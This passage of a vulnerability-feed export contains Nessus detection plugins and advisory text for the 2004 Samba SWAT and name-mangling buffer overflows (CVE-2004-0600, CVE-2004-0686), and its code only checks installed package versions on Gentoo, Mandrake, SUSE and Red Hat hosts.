The overflow in the\n sambaMungedDial handling code is not thought to be exploitable. The buffer\n overflow in 'mangling method = hash' code could also be used to execute\n arbitrary code on vulnerable configurations.\n \nWorkaround :\n\n Users disabling SWAT, not using ldapsam passdb backends and not using the\n 'mangling method = hash' option are not vulnerable.", "edition": 26, "published": "2004-08-30T00:00:00", "title": "GLSA-200407-21 : Samba: Multiple buffer overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-08-30T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:samba"], "id": "GENTOO_GLSA-200407-21.NASL", "href": "https://www.tenable.com/plugins/nessus/14554", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200407-21.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14554);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"GLSA\", value:\"200407-21\");\n\n script_name(english:\"GLSA-200407-21 : Samba: Multiple buffer overflows\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200407-21\n(Samba: Multiple buffer overflows)\n\n Evgeny Demidov found a buffer overflow in SWAT, located in the base64 data\n decoder used to handle HTTP basic authentication (CAN-2004-0600). The same\n flaw is present in the code used to handle the sambaMungedDial attribute\n value, when using the ldapsam passdb backend. Another buffer overflow was\n found in the code used to support the 'mangling method = hash' smb.conf\n option (CAN-2004-0686). Note that the default Samba value for this option\n is 'mangling method = hash2' which is not vulnerable.\n \nImpact :\n\n The SWAT authentication overflow could be exploited to execute arbitrary\n code with the rights of the Samba daemon process. The overflow in the\n sambaMungedDial handling code is not thought to be exploitable. 
The buffer\n overflow in 'mangling method = hash' code could also be used to execute\n arbitrary code on vulnerable configurations.\n \nWorkaround :\n\n Users disabling SWAT, not using ldapsam passdb backends and not using the\n 'mangling method = hash' option are not vulnerable.\"\n );\n # http://www.samba.org/samba/whatsnew/samba-3.0.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-3.0.5.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200407-21\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Samba users should upgrade to the latest version:\n # emerge sync\n # emerge -pv '>=net-fs/samba-3.0.5'\n # emerge '>=net-fs/samba-3.0.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-fs/samba\", unaffected:make_list(\"ge 3.0.5\"), vulnerable:make_list(\"le 3.0.4-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:21", "description": "A vulnerability was discovered in SWAT, the Samba Web Administration\nTool. The routine used to decode the base64 data during HTTP basic\nauthentication is subject to a buffer overrun caused by an invalid\nbase64 character. This same code is also used to internally decode the\nsambaMungedDial attribute value when using the ldapsam passdb backend,\nand to decode input given to the ntlm_auth tool.\n\nThis vulnerability only exists in Samba versions 3.0.2 or later; the\n3.0.5 release fixes the vulnerability. Systems using SWAT, the ldapsam\npassdb backend, and those running winbindd and allowing third-party\napplications to issue authentication requests via ntlm_auth tool\nshould upgrade immediately. (CVE-2004-0600)\n\nA buffer overrun has been located in the code used to support the\n'mangling method = hash' smb.conf option. 
Please be aware that the\ndefault setting for this parameter is 'mangling method = hash2' and\ntherefore not vulnerable. This bug is present in Samba 3.0.0 and\nlater, as well as Samba 2.2.X (CVE-2004-0686)\n\nThis update also fixes a bug where attempting to print in some cases\nwould cause smbd to exit with a signal 11.", "edition": 25, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : samba (MDKSA-2004:071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libsmbclient0-devel", "p-cpe:/a:mandriva:linux:samba-passdb-xml", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "p-cpe:/a:mandriva:linux:samba-doc", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:nss_wins", "p-cpe:/a:mandriva:linux:libsmbclient0-static-devel", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:samba-common", "p-cpe:/a:mandriva:linux:samba-swat", "p-cpe:/a:mandriva:linux:samba-passdb-mysql", "p-cpe:/a:mandriva:linux:samba-client", "p-cpe:/a:mandriva:linux:samba-server", "p-cpe:/a:mandriva:linux:samba-winbind", "p-cpe:/a:mandriva:linux:libsmbclient0", "p-cpe:/a:mandriva:linux:samba-debug"], "id": "MANDRAKE_MDKSA-2004-071.NASL", "href": "https://www.tenable.com/plugins/nessus/14170", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:071. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14170);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"MDKSA\", value:\"2004:071\");\n\n script_name(english:\"Mandrake Linux Security Advisory : samba (MDKSA-2004:071)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was discovered in SWAT, the Samba Web Administration\nTool. The routine used to decode the base64 data during HTTP basic\nauthentication is subject to a buffer overrun caused by an invalid\nbase64 character. This same code is also used to internally decode the\nsambaMungedDial attribute value when using the ldapsam passdb backend,\nand to decode input given to the ntlm_auth tool.\n\nThis vulnerability only exists in Samba versions 3.0.2 or later; the\n3.0.5 release fixes the vulnerability. Systems using SWAT, the ldapsam\npassdb backend, and tose running winbindd and allowing third- party\napplications to issue authentication requests via ntlm_auth tool\nshould upgrade immediately. (CVE-2004-0600)\n\nA buffer overrun has been located in the code used to support the\n'mangling method = hash' smb.conf option. Please be aware that the\ndefault setting for this parameter is 'mangling method = hash2' and\ntherefore not vulnerable. 
This bug is present in Samba 3.0.0 and\nlater, as well as Samba 2.2.X (CVE-2004-0686)\n\nThis update also fixes a bug where attempting to print in some cases\nwould cause smbd to exit with a signal 11.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-passdb-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-passdb-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2004/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libsmbclient0-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libsmbclient0-devel-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libsmbclient0-static-devel-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"nss_wins-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-client-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-common-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-doc-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-passdb-mysql-3.0.2a-3.2.100mdk\", yank:\"mdk\")) 
flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-passdb-xml-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-server-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-swat-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-winbind-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"nss_wins-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-client-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-common-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-doc-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-server-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-swat-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-winbind-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libsmbclient0-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libsmbclient0-devel-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libsmbclient0-static-devel-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"nss_wins-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-client-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-common-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", 
reference:\"samba-debug-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-doc-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-server-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-swat-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-winbind-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:14:43", "description": "The remote host is missing the patch for the advisory SUSE-SA:2004:022 (samba).\n\n\nThe Samba Web Administration Tool (SWAT) was found vulnerable to\na buffer overflow in its base64 code. This buffer overflow can possibly\nbe exploited remotely, before any authentication takes place, to execute\narbitrary code.\nThe same piece of vulnerable code was also used in ldapsam passdb and\nin the ntlm_auth tool.\nThis vulnerability only exists on Samba 3.0.2 to 3.0.4.\n\nAnother buffer overflow was found in Samba 3.0.0 and later, as well as\nin Samba 2.2.x. This overflow exists in the hash code of the mangling\nmethod (smb.conf: mangling method = hash); the default uses hash2, which\nis not vulnerable.\n\nThere is no temporary workaround known. The first proof-of-concept\nexploits were seen on public mailing lists.\n\nAfter the installation has completed successfully, please restart the\nsamba daemon.\n/usr/sbin/rcsmb restart\n\nSWAT is called by inetd/xinetd. 
Therefore it is sufficient to kill all\nrunning instances of SWAT only.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.", "edition": 23, "published": "2004-07-25T00:00:00", "title": "SUSE-SA:2004:022: samba", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-07-25T00:00:00", "cpe": [], "id": "SUSE_SA_2004_022.NASL", "href": "https://www.tenable.com/plugins/nessus/13838", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2004:022\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(13838);\n script_bugtraq_id(10780);\n script_version(\"1.16\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n \n name[\"english\"] = \"SUSE-SA:2004:022: samba\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2004:022 (samba).\n\n\nThe Samba Web Administration Tool (SWAT) was found vulnerable to\na buffer overflow in its base64 code. This buffer overflow can possibly\nbe exploited remotely before any authentication took place to execute\narbitrary code.\nThe same piece of vulnerable code was also used in ldapsam passdb and\nin the ntlm_auth tool.\nThis vulnerability only exists on Samba 3.0.2 to 3.0.4.\n\nAnother buffer overflow was found in Samba 3.0.0 and later, as well as\nin Samba 2.2.x. 
This overflow exists in the hash code of the mangling\nmethod (smb.conf: mangling method = hash), the default uses hash2 which\nis not vulnerable.\n\nThere is no temporary workaround known. The first proof-of-concept\nexploits were seen on public mailing lists.\n\nAfter the installation was successfully completed please restart the\nsamba daemon.\n/usr/sbin/rcsmb restart\n\nSWAT is called by inetd/xinetd. Therefore it is sufficient to kill all\nrunning instances of SWAT only.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2004_22_samba.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the samba package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"samba-2.2.8a-218\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( 
reference:\"samba-client-2.2.8a-218\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-vscan-0.3.2a-271\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-client-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-vscan-0.3.2a-273\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-doc-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-devel-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-2.2.8a-220\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-client-2.2.8a-220\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-2.2.8a-220\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-devel-2.2.8a-220\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-client-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-pdb-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-python-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-vscan-0.3.4-83.30\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-winbind-3.0.4-1.27\", 
release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-doc-3.0.4-1.12\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-devel-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"samba-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"samba-\", release:\"SUSE8.2\")\n || rpm_exists(rpm:\"samba-\", release:\"SUSE9.0\")\n || rpm_exists(rpm:\"samba-\", release:\"SUSE9.1\") )\n{\n set_kb_item(name:\"CVE-2004-0600\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0686\", value:TRUE);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:19", "description": "Updated samba packages that fix buffer overflows, as well as other\nvarious bugs, are now available.\n\nSamba provides file and printer sharing services to SMB/CIFS clients.\n\nEvgeny Demidov discovered a flaw in the internal routine used by the\nSamba Web Administration Tool (SWAT) in Samba versions 3.0.2 through\n3.0.4. When decoding base-64 data during HTTP basic authentication, an\ninvalid base-64 character could cause a buffer overflow. If the SWAT\nadministration service is enabled, this flaw could allow an attacker\nto execute arbitrary code. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CVE-2004-0600 to this\nissue.\n\nAdditionally, the Samba team discovered a buffer overflow in the code\nused to support the 'mangling method = hash' smb.conf option. Please\nbe aware that the default setting for this parameter is 'mangling\nmethod = hash2' and therefore not vulnerable. 
The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0686 to this issue.\n\nThis release includes the updated upstream version 3.0.4 together with\nbackported security patches to correct these issues as well as a\nnumber of post-3.0.4 bug fixes from the Samba subversion repository.\n\nThe most important bug fix allows Samba users to change their\npasswords if Microsoft patch KB 828741 (a critical update) had been\napplied.\n\nAll users of Samba should upgrade to these updated packages, which\nresolve these issues.", "edition": 28, "published": "2004-07-22T00:00:00", "title": "RHEL 3 : samba (RHSA-2004:259)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-07-22T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-swat"], "id": "REDHAT-RHSA-2004-259.NASL", "href": "https://www.tenable.com/plugins/nessus/13658", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:259. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13658);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"RHSA\", value:\"2004:259\");\n\n script_name(english:\"RHEL 3 : samba (RHSA-2004:259)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix buffer overflows, as well as other\nvarious bugs, are now available.\n\nSamba provides file and printer sharing services to SMB/CIFS clients.\n\nEvgeny Demidov discovered a flaw in the internal routine used by the\nSamba Web Administration Tool (SWAT) in Samba versions 3.0.2 through\n3.0.4. When decoding base-64 data during HTTP basic authentication, an\ninvalid base-64 character could cause a buffer overflow. If the SWAT\nadministration service is enabled, this flaw could allow an attacker\nto execute arbitrary code. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CVE-2004-0600 to this\nissue.\n\nAdditionally, the Samba team discovered a buffer overflow in the code\nused to support the 'mangling method = hash' smb.conf option. Please\nbe aware that the default setting for this parameter is 'mangling\nmethod = hash2' and therefore not vulnerable. 
The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0686 to this issue.\n\nThis release includes the updated upstream version 3.0.4 together with\nbackported security patches to correct these issues as well as a\nnumber of post-3.0.4 bug fixes from the Samba subversion repository.\n\nThe most important bug fix allows Samba users to change their\npasswords if Microsoft patch KB 828741 (a critical update) had been\napplied.\n\nAll users of Samba should upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:259\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
